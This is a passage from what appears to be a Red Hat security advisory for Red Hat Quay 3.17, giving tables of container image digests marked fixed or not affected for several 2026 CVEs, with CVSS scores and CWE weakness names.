Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Important

CVE-2026-4427

No description is available for this CVE.

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix

Known not affected 27 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64		—

CVE-2026-27459

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Important

CVE-2026-29063

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix

Known not affected 27 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64		—

Threats

Impact Important

CVE-2026-29074

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-776 - Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
